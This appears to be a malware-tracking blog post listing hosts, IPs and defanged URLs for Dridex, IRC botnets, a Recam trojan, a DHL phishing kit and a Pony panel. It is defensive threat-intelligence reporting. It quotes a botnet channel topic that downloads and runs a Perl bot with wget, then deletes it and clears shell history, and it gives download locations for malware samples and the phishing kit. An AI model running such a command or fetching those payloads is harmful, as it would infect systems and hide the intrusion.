62.76.191.108 (Dridex Downloader Hosted In Russian Federation, Saint Petersburg, IT House Ltd)

URLs:

hxxp://www.mraguas.com/43543r34r/843tf.exe
hxxp://clothesmaxusa.com/43543r34r/843tf.exe
hxxp://69.61.48.46/43543r34r/843tf.exe

Contact server: 62.76.191.108:1743

Hosting info:
http://whois.domaintools.com/62.76.191.108

comment.dyn.mk (Linux IRC Bots Hosted In Korea, Republic Of, Seoul, SK Broadband Co Ltd)

Resolved: [ comment.dyn.mk ] to [ 1.234.46.241 ], possibly a hacked machine.

$server = 'comment.dyn.mk' unless $server;
my $port = '6667';

[11:00] * Now talking in #kill  (around 100 bots inside)
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34

You can get the Perl bot code here if he deletes the file.

Hosting info:
http://whois.domaintools.com/1.234.46.241

munachim.linkpc.net (Trojan-Spy.Win32.Recam.yyy Hosted In Canada, Vankleek Hill, Maxx Ltd.)

Resolved: [ munachim.linkpc.net ] to [ 67.215.4.74 ]

Contacted hosts:

 hxxp://workshopnw.ddns.net
 hxxp://67.215.4.74
 hxxp://serialcheck55.serveblog.net
 hxxp://gbuzue.ddns.net:288
 hxxp://sedon1.ddns.net

Sample here: hxxp://clintonllc.com/swift.scr

Hosting info:
http://whois.domaintools.com/67.215.4.74

DHL Phishing Script (Hosted In United States, Provo, Websitewelcome.com)

Resolved: [ rentmyryde.com ] to [ 192.232.247.118 ]

Main page: hxxp://rentmyryde.com/css/DHL/DHL/tracking.php

DHL.zip here: hxxp://rentmyryde.com/css/

Lamers behind the script: "Created BY Mr-Anobs / Modified By Realone"

Hosting info:
http://whois.domaintools.com/192.232.247.118

inmrvogurin.ru (Pony Hosted In Macao, Macau, Alan Hqservers Web Studio)

This guy keeps changing domain names but uses the same shit.

Resolved: [ inmrvogurin.ru ] to [ 163.53.247.144 ]

URLs:
hxxp://inmrvogurin.ru/SY/test/gate.php
hxxp://inmrvogurin.ru/SY/test/admin.php (the "TF" letters in red are maybe a tribute to TrojanForge)

Sample here: hxxp://inmrvogurin.ru/SY/test/micro.exe

Hosting info:
http://whois.domaintools.com/163.53.247.144